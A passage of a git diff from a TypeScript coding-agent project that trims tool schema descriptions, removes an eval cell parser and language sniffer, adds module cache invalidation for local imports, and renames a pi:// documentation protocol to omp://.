text"), + all: z.boolean().describe("replace all occurrences").optional(), }) .strict(); export const replaceEditSchema = z .object({ - path: z.string().describe("file path for edits"), - edits: z.array(replaceEditEntrySchema).min(1).describe("Replacements"), + path: z.string().describe("file path"), + edits: z.array(replaceEditEntrySchema).min(1).describe("replacements"), }) .strict(); diff --git a/packages/coding-agent/src/edit/renderer.ts b/packages/coding-agent/src/edit/renderer.ts index ee48848e9..886dbc1be 100644 --- a/packages/coding-agent/src/edit/renderer.ts +++ b/packages/coding-agent/src/edit/renderer.ts @@ -1,9 +1,10 @@ /** * Edit tool renderer and LSP batching helpers. */ -import { sanitizeText } from "@oh-my-pi/pi-natives"; + import type { Component } from "@oh-my-pi/pi-tui"; import { Text, visibleWidth, wrapTextWithAnsi } from "@oh-my-pi/pi-tui"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; import type { RenderResultOptions } from "../extensibility/custom-tools/types"; import type { FileDiagnosticsResult } from "../lsp"; import { renderDiff as renderDiffColored } from "../modes/components/diff"; diff --git a/packages/coding-agent/src/edit/streaming.ts b/packages/coding-agent/src/edit/streaming.ts index 02b743959..e89c7dc24 100644 --- a/packages/coding-agent/src/edit/streaming.ts +++ b/packages/coding-agent/src/edit/streaming.ts @@ -13,7 +13,7 @@ * the injected `editMode` rather than probing argument shape. */ -import { sanitizeText } from "@oh-my-pi/pi-natives"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; import { ABORT_MARKER, BEGIN_PATCH_MARKER, diff --git a/packages/coding-agent/src/eval/eval.lark b/packages/coding-agent/src/eval/eval.lark deleted file mode 100644 index 5e50115ce..000000000 --- a/packages/coding-agent/src/eval/eval.lark +++ /dev/null @@ -1,36 +0,0 @@ -// Canonical Eval input. Each cell is introduced by a single header line: -// -// *** Cell <LANG>:"<title>" [t:<duration>] [rst] -// -// Attribute order is fixed: language+title, then optional timeout, then -// optional reset flag. Title may be empty (`py:""`). -// -// Tokens: -// -// py:"..." | js:"..." language plus title (required) -// t:<digits>(ms|s|m)? per-cell timeout (default 30s) -// rst reset this language's kernel before running -// -// Everything between one header line and the next (or the optional trailing -// `*** End`, or end of input) is the cell's code, verbatim. The runtime -// parser additionally accepts content before the first header as an implicit -// default-language cell, but that is lenient fallback and MUST NOT be relied -// on. - -start: cell+ end_marker - -cell: cell_header code_line* - -cell_header: "*** Cell" WS_INLINE LANG_TITLE (WS_INLINE T_ATTR)? (WS_INLINE RST_FLAG)? LF - -end_marker: "*** End" LF? - -code_line: CODE_TEXT LF | LF -CODE_TEXT: /([^*\r\n]|\*\*?[^*\r\n])+\*{0,2}|\*{1,2}/ - -LANG_TITLE: ("py" | "js") ":\"" /[^"\r\n]*/ "\"" -T_ATTR: "t:" /\d+(ms|s|m)?/ -RST_FLAG: "rst" - -%import common.LF -%import common.WS_INLINE diff --git a/packages/coding-agent/src/eval/index.ts b/packages/coding-agent/src/eval/index.ts index 4d0c0097d..5986aa401 100644 --- a/packages/coding-agent/src/eval/index.ts +++ b/packages/coding-agent/src/eval/index.ts @@ -1,6 +1,4 @@ export * from "./backend"; export { default as jsBackend } from "./js"; -export * from "./parse"; export { default as pythonBackend } from "./py"; -export * from "./sniff"; export * from "./types"; diff --git a/packages/coding-agent/src/eval/js/shared/runtime.ts b/packages/coding-agent/src/eval/js/shared/runtime.ts index 9b97b593b..7b0f8b38d 100644 --- a/packages/coding-agent/src/eval/js/shared/runtime.ts +++ b/packages/coding-agent/src/eval/js/shared/runtime.ts @@ -137,6 +137,13 @@ export class JsRuntime { }, __omp_import__: async (source: string, options?: ImportCallOptions) => { const target = resolveImportSpecifier(this.#cwd, source); + // Always invalidate cached module records for user-owned source files so edits + // between cells are picked up. Bun ignores query-string busting on `file:` URLs + // but honors `delete require.cache[absPath]`; bare specifiers and URL schemes are + // left alone to keep package identity stable across cells. + if (isLocalPathSpecifier(source) && path.isAbsolute(target)) { + delete require.cache[target]; + } return options !== undefined ? await import(target, options) : await import(target); }, __omp_emit_status__: (op: string, data: Record<string, unknown> = {}) => { @@ -193,3 +200,21 @@ function resolveImportSpecifier(cwd: string, source: string): string { return source; } } + +/** + * Returns true when the original specifier is a relative or absolute filesystem path + * (i.e. user-owned source the agent is iterating on). Bare specifiers and URL schemes + * are excluded — `node:` built-ins cannot be reloaded, and busting bare packages would + * defeat module identity for every cell while bringing no editing benefit. + */ +function isLocalPathSpecifier(source: string): boolean { + return ( + source.startsWith("./") || + source.startsWith("../") || + source === "." || + source === ".." || + source.startsWith("/") || + source.startsWith("~/") || + /^[a-zA-Z]:[\\/]/.test(source) + ); +} diff --git a/packages/coding-agent/src/eval/parse.ts b/packages/coding-agent/src/eval/parse.ts deleted file mode 100644 index 7e566f900..000000000 --- a/packages/coding-agent/src/eval/parse.ts +++ /dev/null @@ -1,407 +0,0 @@ -import { sniffEvalLanguage } from "./sniff"; -import type { EvalLanguage } from "./types"; - -export type EvalLanguageOrigin = "default" | "header"; - -export interface ParsedEvalCell { - index: number; - title?: string; - code: string; - language: EvalLanguage; - languageOrigin: EvalLanguageOrigin; - timeoutMs: number; - reset: boolean; -} - -export interface ParsedEvalInput { - cells: ParsedEvalCell[]; - /** - * True when the parser encountered `*** Abort` (recovery sentinel emitted - * by the agent loop's harmony-leak mitigation; see - * `docs/ERRATA-GPT5-HARMONY.md`). The cell containing the marker, if any, - * is dropped — its body is incomplete and unsafe to execute. - */ - aborted?: boolean; -} - -const DEFAULT_TIMEOUT_MS = 30_000; -const DEFAULT_LANGUAGE: EvalLanguage = "python"; - -/** - * Canonical language tokens plus common long-form aliases. The grammar - * advertises only `PY` / `JS` / `TS`, but unconstrained models reach for - * `Python` / `JavaScript` / `TypeScript` often enough that we accept them. - */ -const LANGUAGE_MAP: Record<string, EvalLanguage> = { - PY: "python", - PYTHON: "python", - IPY: "python", - IPYTHON: "python", - JS: "js", - JAVASCRIPT: "js", - TS: "js", - TYPESCRIPT: "js", -}; - -// Markers are case-insensitive, accept ≥2 leading stars (so `**Cell` and -// `*** Cell` both work), and tolerate any whitespace (including tabs) -// between tokens. Models that can't constrain-sample frequently emit minor -// variations like `**End` or `*** cell py`. -const STARS = String.raw`\*{2,}`; -// Cell header: `*** Cell <attrs...>`. The remainder of the line is captured -// and tokenized separately so we can handle quoted values. -const CELL_RE = new RegExp(`^${STARS}\\s*Cell\\b\\s*(.*)$`, "i"); -// `*** End` is a tolerated cell/file terminator. Documented as required at -// the file level in the lark grammar (the trailing `*** End` quirks GPT- -// trained models naturally produce), but optional at the parser level. -const END_RE = new RegExp(`^${STARS}\\s*End\\b.*$`, "i"); -// `*** Abort` is the harmony-leak recovery sentinel; see ABORT_WARNING. -const ABORT_RE = new RegExp(`^${STARS}\\s*Abort\\s*$`, "i"); - -/** - * Warning text appended to the eval tool result when parsing terminated on - * `*** Abort`. Tells the model that earlier cells (if any) ran normally and - * that any aborted cell needs to be re-issued. - */ -export const ABORT_WARNING = - "Tool stream truncated mid-call due to detected output corruption. Earlier cells (if any) executed normally; their state persists. Re-issue the aborted cell."; - -const DURATION_RE = /^(\d+)(ms|s|m)?$/i; - -function resolveLang(token: string | undefined): EvalLanguage | undefined { - return token ? LANGUAGE_MAP[token.toUpperCase()] : undefined; -} - -function parseDurationMs(raw: string, lineNumber: number): number { - const match = DURATION_RE.exec(raw.trim()); - if (!match) { - throw new Error( - `Eval line ${lineNumber}: invalid duration \`${raw}\`; use a number with optional ms, s, or m units.`, - ); - } - const value = Number.parseInt(match[1], 10); - const unit = (match[2] ?? "s").toLowerCase(); - if (unit === "ms") return value; - if (unit === "s") return value * 1000; - return value * 60_000; -} - -// Markdown fence wrapping a single bare cell, e.g. "```py\n...\n```" or -// "```\n...\n```". Used by models that wrap eval input in code fences. -const FENCE_OPEN_RE = /^```\s*([A-Za-z]\w*)?\s*$/; -const FENCE_CLOSE_RE = /^```\s*$/; - -/** - * Last-resort fallback when the input has no recognizable `*** Cell` header. - * Models that can't constrain-sample sometimes pass bare code or wrap it in - * a markdown fence (```py / ```python / bare ```). Treat the whole input as - * a single implicit cell, sniffing the language from the body. - */ -function parseImplicitCell(lines: string[]): ParsedEvalCell { - let body = lines.slice(); - while (body.length > 0 && body[0].trim() === "") body.shift(); - while (body.length > 0 && body[body.length - 1].trim() === "") body.pop(); - - let fenceLang: string | undefined; - if (body.length >= 2) { - const open = FENCE_OPEN_RE.exec(body[0]); - const closeIdx = body.length - 1; - if (open && FENCE_CLOSE_RE.test(body[closeIdx])) { - fenceLang = open[1]; - body = body.slice(1, closeIdx); - } - } - - const code = body.join("\n"); - const explicitLanguage = resolveLang(fenceLang); - const language = explicitLanguage ?? sniffEvalLanguage(code) ?? DEFAULT_LANGUAGE; - return { - index: 0, - title: undefined, - code, - language, - languageOrigin: explicitLanguage ? "header" : "default", - timeoutMs: DEFAULT_TIMEOUT_MS, - reset: false, - }; -} - -/** - * Tokenize a `*** Cell` header's attribute list while preserving quoted - * segments (`id:"some title"`, `py:"hi"`, single quotes too) as single - * tokens. Outer whitespace separates tokens; the quote characters - * themselves are kept verbatim so attribute parsing can strip them later. - */ -function tokenizeCellAttrs(input: string): string[] { - const tokens: string[] = []; - let i = 0; - while (i < input.length) { - while (i < input.length && /\s/.test(input[i])) i++; - if (i >= input.length) break; - let token = ""; - while (i < input.length && !/\s/.test(input[i])) { - const ch = input[i]; - if (ch === '"' || ch === "'") { - token += ch; - i++; - while (i < input.length && input[i] !== ch) { - token += input[i]; - i++; - } - if (i < input.length) { - token += input[i]; - i++; - } - } else { - token += ch; - i++; - } - } - tokens.push(token); - } - return tokens; -} - -interface CellHeader { - language: EvalLanguage | undefined; - languageOrigin: EvalLanguageOrigin; - title: string | undefined; - timeoutMs: number | undefined; - reset: boolean; -} - -/** - * Map an attribute key (from `key:value` or bare `key`) to one of the three - * canonical roles. Canonical keys: `id`, `t`, `rst`. Fallback aliases — - * accepted but not advertised in the prompt — cover common synonyms LLMs - * reach for instead of the short canonical. - */ -const ID_KEYS = new Set(["id", "title", "name", "cell", "file", "label"]); -const T_KEYS = new Set(["t", "timeout", "duration", "time"]); -const RST_KEYS = new Set(["rst", "reset"]); - -function classifyAttrKey(key: string): "id" | "t" | "rst" | null { - if (ID_KEYS.has(key)) return "id"; - if (T_KEYS.has(key)) return "t"; - if (RST_KEYS.has(key)) return "rst"; - return null; -} - -// `key:value` form. `value` may be `"..."`, `'...'`, or a bare run. -const ATTR_TOKEN_RE = /^([a-zA-Z][\w-]*)(?::(?:"([^"]*)"|'([^']*)'|(.*)))?$/; -// Bare positional duration (lenient — `t:` is canonical). -const DURATION_TOKEN_RE = /^\d+(?:ms|s|m)?$/; - -function parseBooleanFlag(value: string): boolean | undefined { - const v = value.trim().toLowerCase(); - if (v === "true" || v === "1" || v === "yes" || v === "on") return true; - if (v === "false" || v === "0" || v === "no" || v === "off") return false; - return undefined; -} - -/** - * Decode a `*** Cell` header's attribute list into language, title, - * timeout, and reset flag. - * - * Token forms (all optional, any order): - * - `py` / `js` / `ts` bare language - * - `py:"..."` / `js:"..."` / `ts:"..."` language + title shorthand - * - `id:"..."` cell title (canonical) - * - `t:<duration>` per-cell timeout (canonical) - * - `<duration>` (e.g. `30s`) bare positional duration - * - `rst` reset flag (canonical) - * - `rst:true|false|1|0|yes|no|on|off` reset flag with explicit value - * - * Fallback aliases (accepted but not advertised in the prompt): - * - id: title, name, cell, file, label - * - t: timeout, duration, time - * - rst: reset - * - * Quotes may be `"` or `'`. Truly unknown keys are silently dropped. First - * occurrence wins when a key is repeated (canonical or alias). Anything - * that doesn't classify accumulates as a positional title fragment joined - * by spaces. - */ -function parseCellHeader(rest: string, lineNumber: number): CellHeader { - const tokens = tokenizeCellAttrs(rest); - let language: EvalLanguage | undefined; - let titleAttr: string | undefined; - let positionalDurationMs: number | undefined; - let tAttr: string | undefined; - let rstAttr: string | undefined; - let bareReset = false; - const titleParts: string[] = []; - - for (const token of tokens) { - // Bare reset flag (canonical or alias). - if (RST_KEYS.has(token.toLowerCase())) { - bareReset = true; - continue; - } - - const attrMatch = ATTR_TOKEN_RE.exec(token); - if (attrMatch && token.includes(":")) { - const key = attrMatch[1].toLowerCase(); - const value = attrMatch[2] ?? attrMatch[3] ?? attrMatch[4] ?? ""; - - // Language-with-title shorthand: `py:"foo"`, `js:'bar'`, etc. - const langCandidate = resolveLang(key); - if (langCandidate) { - if (language === undefined) language = langCandidate; - if (titleAttr === undefined && value !== "") titleAttr = value; - continue; - } - - const role = classifyAttrKey(key); - if (role === "id" && titleAttr === undefined) titleAttr = value; - else if (role === "t" && tAttr === undefined) tAttr = value; - else if (role === "rst" && rstAttr === undefined) rstAttr = value; - // unknown / repeated keys silently dropped - continue; - } - - // Bare language token (no colon). - const lang = resolveLang(token); - if (lang && language === undefined) { - language = lang; - continue; - } - - // Bare positional duration (lenient — `t:` is canonical). - if (positionalDurationMs === undefined && DURATION_TOKEN_RE.test(token)) { - positionalDurationMs = parseDurationMs(token, lineNumber); - continue; - } - - titleParts.push(token); - } - - const explicitTitle = (titleAttr ?? "").trim(); - const positionalTitle = titleParts.join(" ").trim(); - const title = explicitTitle.length > 0 ? explicitTitle : positionalTitle.length > 0 ? positionalTitle : undefined; - - let timeoutMs: number | undefined; - if (tAttr !== undefined) { - timeoutMs = parseDurationMs(tAttr, lineNumber); - } else if (positionalDurationMs !== undefined) { - timeoutMs = positionalDurationMs; - } - - let reset = false; - if (rstAttr !== undefined) { - const parsed = parseBooleanFlag(rstAttr); - if (parsed === undefined) { - throw new Error(`Eval line ${lineNumber}: invalid rst value \`${rstAttr}\`; use true or false.`); - } - reset = parsed; - } else if (bareReset) { - reset = true; - } - - return { - language, - languageOrigin: language ? "header" : "default", - title, - timeoutMs, - reset, - }; -} - -export function parseEvalInput(input: string): ParsedEvalInput { - const normalized = input.replace(/\r\n?/g, "\n"); - const lines = normalized.split("\n"); - if (lines.length > 0 && lines[lines.length - 1] === "") lines.pop(); - - const cells: ParsedEvalCell[] = []; - let aborted = false; - let i = 0; - - // Skip leading blank lines. - while (i < lines.length && lines[i].trim() === "") i++; - - // Lenient fallback: if the input has no recognizable cell header, treat - // the entire input as one implicit cell — unless that content contains - // `*** Abort`, in which case the body is incomplete/unsafe and we drop it. - if (i < lines.length && !CELL_RE.test(lines[i])) { - const tail = lines.slice(i); - if (tail.some(line => ABORT_RE.test(line))) { - return { cells, aborted: true }; - } - const cell = parseImplicitCell(tail); - if (cell.code.length > 0) cells.push(cell); - return { cells }; - } - - while (i < lines.length) { - const headerLine = lines[i]; - const cellMatch = CELL_RE.exec(headerLine); - if (!cellMatch) { - // Stray content between/after cells (blank lines were already - // consumed). `*** Abort` here terminates parsing; `*** End` is - // the optional file-level terminator (silently consumed). Anything - // else — typically a harmony-leak fragment — is skipped. - if (ABORT_RE.test(headerLine)) { - aborted = true; - break; - } - i++; - continue; - } - const header = parseCellHeader(cellMatch[1] ?? "", i + 1); - i++; - - // Collect cell body. Close on `*** End` (any form), the next - // `*** Cell` header, or `*** Abort` (which drops the in-progress - // cell as its body is partial and unsafe to run). - const codeLines: string[] = []; - let cellAborted = false; - while (i < lines.length) { - const line = lines[i]; - if (ABORT_RE.test(line)) { - cellAborted = true; - aborted = true; - i++; - break; - } - if (END_RE.test(line)) { - i++; - break; - } - if (CELL_RE.test(line)) break; - codeLines.push(line); - i++; - } - - if (cellAborted) break; - - // Strip trailing blank lines so visual spacing between cells doesn't - // leak into the preceding cell's code. - while (codeLines.length > 0 && codeLines[codeLines.length - 1].trim() === "") { - codeLines.pop(); - } - const code = codeLines.join("\n"); - - const language = header.language ?? sniffEvalLanguage(code) ?? DEFAULT_LANGUAGE; - const languageOrigin: EvalLanguageOrigin = header.language ? "header" : "default"; - - cells.push({ - index: cells.length, - title: header.title, - code, - language, - languageOrigin, - timeoutMs: header.timeoutMs ?? DEFAULT_TIMEOUT_MS, - reset: header.reset, - }); - - // Skip blank separator lines between cells; an `*** Abort` here - // terminates parsing while keeping previously-collected cells. - while (i < lines.length && lines[i].trim() === "") i++; - if (i < lines.length && ABORT_RE.test(lines[i])) { - aborted = true; - break; - } - } - - return aborted ? { cells, aborted: true } : { cells }; -} diff --git a/packages/coding-agent/src/eval/py/kernel.ts b/packages/coding-agent/src/eval/py/kernel.ts index dfd43bbf3..cdeee7722 100644 --- a/packages/coding-agent/src/eval/py/kernel.ts +++ b/packages/coding-agent/src/eval/py/kernel.ts @@ -626,7 +626,7 @@ export class PythonKernel { const exitedPromise = this.#exitedPromise; const timeout = new Promise<null>(resolve => { const timer = setTimeout(() => resolve(null), Math.max(0, timeoutMs)); - (timer as { unref?: () => void }).unref?.(); + timer.unref?.(); }); return Promise.race([exitedPromise.then(code => code as number | null), timeout]); } diff --git a/packages/coding-agent/src/eval/sniff.ts b/packages/coding-agent/src/eval/sniff.ts deleted file mode 100644 index 399e42b66..000000000 --- a/packages/coding-agent/src/eval/sniff.ts +++ /dev/null @@ -1,28 +0,0 @@ -import type { EvalLanguage } from "./types"; - -/** - * Best-effort language sniff for cells with no explicit `language`. - * - * Order: - * 1. Shebang on first line (`#!/usr/bin/env python`, `#!/usr/bin/env node`, etc.) - * 2. Strong syntactic markers unique to one language. Bias false negatives over - * false positives — anything ambiguous returns `undefined` and the caller - * falls back to the default-backend rules. - */ -export function sniffEvalLanguage(code: string): EvalLanguage | undefined { - const stripped = code.replace(/^\s+/, ""); - if (stripped.startsWith("#!")) { - const firstLine = stripped.split("\n", 1)[0]!.toLowerCase(); - if (/(\bpython\d?\b|\bipython\b)/.test(firstLine)) return "python"; - if (/(\bnode\b|\bbun\b|\bdeno\b|\bjavascript\b|\bjs\b)/.test(firstLine)) return "js"; - } - const jsMarkers = - /(^|\n)\s*(const|let|var|async\s+function|function\s*\*?\s*[\w$]*\s*\(|import\s+[^\n]+\sfrom\s|export\s+(default|const|let|function|class|async)|require\s*\(|console\.\w+\s*\(|=>|;\s*$)/m; - const pyMarkers = - /(^|\n)\s*(def\s+\w+\s*\(|from\s+[\w.]+\s+import|import\s+\w+(\s+as\s+\w+)?\s*$|class\s+\w+\s*[(:]|print\s*\(|elif\s+[^\n]*:|with\s+[^\n]+:\s*$|@[\w.]+\s*$)/m; - const hasJs = jsMarkers.test(code); - const hasPy = pyMarkers.test(code); - if (hasJs && !hasPy) return "js"; - if (hasPy && !hasJs) return "python"; - return undefined; -} diff --git a/packages/coding-agent/src/exa/researcher.ts b/packages/coding-agent/src/exa/researcher.ts index 64173249b..29bec943a 100644 --- a/packages/coding-agent/src/exa/researcher.ts +++ b/packages/coding-agent/src/exa/researcher.ts @@ -14,9 +14,9 @@ const researcherStartTool = createExaTool( "Start Deep Research", "Start an asynchronous deep research task using Exa's researcher. Returns a task_id for polling completion.", z.object({ - query: z.string().describe("Research query to investigate"), - depth: z.number().int().min(1).max(5).describe("Research depth (1-5, default: 3)").optional(), - breadth: z.number().int().min(1).max(5).describe("Research breadth (1-5, default: 3)").optional(), + query: z.string().describe("research query"), + depth: z.number().int().min(1).max(5).describe("research depth (1-5)").optional(), + breadth: z.number().int().min(1).max(5).describe("research breadth (1-5)").optional(), }), "deep_researcher_start", { formatResponse: false }, @@ -27,7 +27,7 @@ const researcherPollTool = createExaTool( "Poll Research Status", "Poll the status of an asynchronous research task. Returns status (pending|running|completed|failed) and result if completed.", z.object({ - task_id: z.string().describe("Task ID returned from exa_researcher_start"), + task_id: z.string().describe("task id"), }), "deep_researcher_check", { formatResponse: false }, diff --git a/packages/coding-agent/src/exa/search.ts b/packages/coding-agent/src/exa/search.ts index 73990fa15..b8ad803e0 100644 --- a/packages/coding-agent/src/exa/search.ts +++ b/packages/coding-agent/src/exa/search.ts @@ -30,28 +30,16 @@ Parameters: - num_results: Maximum number of results to return (default: 10, max: 100)`, z.object({ - query: z.string().describe("Search query"), - type: z - .enum(["keyword", "neural", "auto"]) - .describe("Search type - neural (semantic), keyword (exact), or auto") - .optional(), - include_domains: z.array(z.string()).describe("Only include results from these domains").optional(), - exclude_domains: z.array(z.string()).describe("Exclude results from these domains").optional(), - start_published_date: z - .string() - .describe("Filter results published after this date (ISO 8601 format)") - .optional(), - end_published_date: z.string().describe("Filter results published before this date (ISO 8601 format)").optional(), - use_autoprompt: z.boolean().describe("Let Exa optimize your query automatically (default: true)").optional(), - text: z.boolean().describe("Include page text content in results (costs more, default: false)").optional(), - highlights: z.boolean().describe("Include highlighted relevant snippets (default: false)").optional(), - num_results: z - .number() - .int() - .min(1) - .max(100) - .describe("Maximum number of results to return (default: 10, max: 100)") - .optional(), + query: z.string().describe("search query"), + type: z.enum(["keyword", "neural", "auto"]).describe("search type").optional(), + include_domains: z.array(z.string()).describe("include domains").optional(), + exclude_domains: z.array(z.string()).describe("exclude domains").optional(), + start_published_date: z.string().describe("published after (iso 8601)").optional(), + end_published_date: z.string().describe("published before (iso 8601)").optional(), + use_autoprompt: z.boolean().describe("autoprompt").optional(), + text: z.boolean().describe("include page text").optional(), + highlights: z.boolean().describe("include highlights").optional(), + num_results: z.number().int().min(1).max(100).describe("max results (1-100)").optional(), }), "web_search_exa", ); diff --git a/packages/coding-agent/src/exa/websets.ts b/packages/coding-agent/src/exa/websets.ts index 84c356be5..7b62ad52e 100644 --- a/packages/coding-agent/src/exa/websets.ts +++ b/packages/coding-agent/src/exa/websets.ts @@ -53,8 +53,8 @@ const websetCreateTool = createWebsetTool( "Create Webset", "Create a new webset collection for organizing web content.", z.object({ - name: z.string().describe("Name of the webset"), - description: z.string().describe("Optional description").optional(), + name: z.string().describe("webset name"), + description: z.string().describe("description").optional(), }), "create_webset", ); @@ -72,7 +72,7 @@ const websetGetTool = createWebsetTool( "Get Webset", "Get details of a specific webset by ID.", z.object({ - id: z.string().describe("Webset ID"), + id: z.string().describe("webset id"), }), "get_webset", ); @@ -82,9 +82,9 @@ const websetUpdateTool = createWebsetTool( "Update Webset", "Update a webset's name or description.", z.object({ - id: z.string().describe("Webset ID"), - name: z.string().describe("New name").optional(), - description: z.string().describe("New description").optional(), + id: z.string().describe("webset id"), + name: z.string().describe("new name").optional(), + description: z.string().describe("new description").optional(), }), "update_webset", ); @@ -94,7 +94,7 @@ const websetDeleteTool = createWebsetTool( "Delete Webset", "Delete a webset and all its contents.", z.object({ - id: z.string().describe("Webset ID"), + id: z.string().describe("webset id"), }), "delete_webset", ); @@ -105,9 +105,9 @@ const websetItemsListTool = createWebsetTool( "List Webset Items", "List items in a webset with optional pagination.", z.object({ - webset_id: z.string().describe("Webset ID"), - limit: z.number().describe("Number of items to return").optional(), - offset: z.number().describe("Pagination offset").optional(), + webset_id: z.string().describe("webset id"), + limit: z.number().describe("max items").optional(), + offset: z.number().describe("offset").optional(), }), "list_webset_items", ); @@ -117,8 +117,8 @@ const websetItemGetTool = createWebsetTool( "Get Webset Item", "Get a specific item from a webset.", z.object({ - webset_id: z.string().describe("Webset ID"), - item_id: z.string().describe("Item ID"), + webset_id: z.string().describe("webset id"), + item_id: z.string().describe("item id"), }), "get_item", ); @@ -129,8 +129,8 @@ const websetSearchCreateTool = createWebsetTool( "Create Webset Search", "Create a new search within a webset.", z.object({ - webset_id: z.string().describe("Webset ID"), - query: z.string().describe("Search query"), + webset_id: z.string().describe("webset id"), + query: z.string().describe("search query"), }), "create_search", ); @@ -140,8 +140,8 @@ const websetSearchGetTool = createWebsetTool( "Get Webset Search", "Get the status and results of a webset search.", z.object({ - webset_id: z.string().describe("Webset ID"), - search_id: z.string().describe("Search ID"), + webset_id: z.string().describe("webset id"), + search_id: z.string().describe("search id"), }), "get_search", ); @@ -151,8 +151,8 @@ const websetSearchCancelTool = createWebsetTool( "Cancel Webset Search", "Cancel a running webset search.", z.object({ - webset_id: z.string().describe("Webset ID"), - search_id: z.string().describe("Search ID"), + webset_id: z.string().describe("webset id"), + search_id: z.string().describe("search id"), }), "cancel_search", ); @@ -163,9 +163,9 @@ const websetEnrichmentCreateTool = createWebsetTool( "Create Enrichment", "Create a new enrichment task for a webset.", z.object({ - webset_id: z.string().describe("Webset ID"), - name: z.string().describe("Enrichment name"), - prompt: z.string().describe("Enrichment prompt"), + webset_id: z.string().describe("webset id"), + name: z.string().describe("enrichment name"), + prompt: z.string().describe("enrichment prompt"), }), "create_enrichment", ); @@ -175,8 +175,8 @@ const websetEnrichmentGetTool = createWebsetTool( "Get Enrichment", "Get the status and results of an enrichment task.", z.object({ - webset_id: z.string().describe("Webset ID"), - enrichment_id: z.string().describe("Enrichment ID"), + webset_id: z.string().describe("webset id"), + enrichment_id: z.string().describe("enrichment id"), }), "get_enrichment", ); @@ -186,10 +186,10 @@ const websetEnrichmentUpdateTool = createWebsetTool( "Update Enrichment", "Update an enrichment's name or prompt.", z.object({ - webset_id: z.string().describe("Webset ID"), - enrichment_id: z.string().describe("Enrichment ID"), - name: z.string().describe("New name").optional(), - prompt: z.string().describe("New prompt").optional(), + webset_id: z.string().describe("webset id"), + enrichment_id: z.string().describe("enrichment id"), + name: z.string().describe("new name").optional(), + prompt: z.string().describe("new prompt").optional(), }), "update_enrichment", ); @@ -199,8 +199,8 @@ const websetEnrichmentDeleteTool = createWebsetTool( "Delete Enrichment", "Delete an enrichment task.", z.object({ - webset_id: z.string().describe("Webset ID"), - enrichment_id: z.string().describe("Enrichment ID"), + webset_id: z.string().describe("webset id"), + enrichment_id: z.string().describe("enrichment id"), }), "delete_enrichment", ); @@ -210,8 +210,8 @@ const websetEnrichmentCancelTool = createWebsetTool( "Cancel Enrichment", "Cancel a running enrichment task.", z.object({ - webset_id: z.string().describe("Webset ID"), - enrichment_id: z.string().describe("Enrichment ID"), + webset_id: z.string().describe("webset id"), + enrichment_id: z.string().describe("enrichment id"), }), "cancel_enrichment", ); @@ -222,8 +222,8 @@ const websetMonitorCreateTool = createWebsetTool( "Create Monitor", "Create a monitoring task for a webset with optional webhook notifications.", z.object({ - webset_id: z.string().describe("Webset ID"), - webhook_url: z.string().describe("Webhook URL for notifications").optional(), + webset_id: z.string().describe("webset id"), + webhook_url: z.string().describe("webhook url").optional(), }), "create_monitor", ); diff --git a/packages/coding-agent/src/goals/tools/goal-tool.ts b/packages/coding-agent/src/goals/tools/goal-tool.ts index f562ac7e7..c634fde23 100644 --- a/packages/coding-agent/src/goals/tools/goal-tool.ts +++ b/packages/coding-agent/src/goals/tools/goal-tool.ts @@ -15,9 +15,9 @@ import { completionBudgetReport, remainingTokens } from "../runtime"; import type { Goal, GoalStatus, GoalToolDetails } from "../state"; const goalSchema = z.object({ - op: z.union([z.literal("create"), z.literal("get"), z.literal("complete")]).describe("Goal operation."), - objective: z.string().describe("Goal objective. Required when op=create.").optional(), - token_budget: z.number().int().describe("Optional positive token budget. Only honored when op=create.").optional(), + op: z.enum(["create", "get", "complete"]).describe("goal operation"), + objective: z.string().describe("goal objective").optional(), + token_budget: z.number().int().describe("token budget").optional(), }); export type GoalToolInput = z.infer<typeof goalSchema>; diff --git a/packages/coding-agent/src/index.ts b/packages/coding-agent/src/index.ts index 350d392d7..ace3d23ce 100644 --- a/packages/coding-agent/src/index.ts +++ b/packages/coding-agent/src/index.ts @@ -2,9 +2,6 @@ import { HookEditorComponent, HookInputComponent, HookSelectorComponent } from " // Core session management -// TypeBox helper for string enums (convenience for custom tools) -// Re-export from pi-ai which uses the correct enum-based schema format -export { StringEnum } from "@oh-my-pi/pi-ai"; // Re-export TUI components for custom tool rendering export { Container, Markdown, Spacer, Text } from "@oh-my-pi/pi-tui"; // Logging diff --git a/packages/coding-agent/src/internal-urls/index.ts b/packages/coding-agent/src/internal-urls/index.ts index 193e8a083..185855dad 100644 --- a/packages/coding-agent/src/internal-urls/index.ts +++ b/packages/coding-agent/src/internal-urls/index.ts @@ -15,8 +15,8 @@ export * from "./json-query"; export * from "./local-protocol"; export * from "./mcp-protocol"; export * from "./memory-protocol"; +export * from "./omp-protocol"; export * from "./parse"; -export * from "./pi-protocol"; export * from "./router"; export * from "./rule-protocol"; export * from "./skill-protocol"; diff --git a/packages/coding-agent/src/internal-urls/pi-protocol.ts b/packages/coding-agent/src/internal-urls/omp-protocol.ts similarity index 79% rename from packages/coding-agent/src/internal-urls/pi-protocol.ts rename to packages/coding-agent/src/internal-urls/omp-protocol.ts index b5e9f9ec1..17f8ecb50 100644 --- a/packages/coding-agent/src/internal-urls/pi-protocol.ts +++ b/packages/coding-agent/src/internal-urls/omp-protocol.ts @@ -1,23 +1,23 @@ /** - * Protocol handler for pi:// URLs. + * Protocol handler for omp:// URLs. * * Serves statically embedded documentation files bundled at build time. * * URL forms: - * - pi:// - Lists all available documentation files - * - pi://<file>.md - Reads a specific documentation file + * - omp:// - Lists all available documentation files + * - omp://<file>.md - Reads a specific documentation file */ import * as path from "node:path"; import { EMBEDDED_DOC_FILENAMES, EMBEDDED_DOCS } from "./docs-index.generated"; import type { InternalResource, InternalUrl, ProtocolHandler } from "./types"; /** - * Handler for pi:// URLs. + * Handler for omp:// URLs. * * Resolves documentation file names to their content, or lists available docs. */ -export class PiProtocolHandler implements ProtocolHandler { - readonly scheme = "pi"; +export class OmpProtocolHandler implements ProtocolHandler { + readonly scheme = "omp"; readonly immutable = true; async resolve(url: InternalUrl): Promise<InternalResource> { @@ -38,7 +38,7 @@ export class PiProtocolHandler implements ProtocolHandler { throw new Error("No documentation files found"); } - const listing = EMBEDDED_DOC_FILENAMES.map(f => `- [${f}](pi://${f})`).join("\n"); + const listing = EMBEDDED_DOC_FILENAMES.map(f => `- [${f}](omp://${f})`).join("\n"); const content = `# Documentation\n\n${EMBEDDED_DOC_FILENAMES.length} files available:\n\n${listing}\n`; return { @@ -52,12 +52,12 @@ export class PiProtocolHandler implements ProtocolHandler { async #readDoc(filename: string, url: InternalUrl): Promise<InternalResource> { // Validate: no traversal, no absolute paths if 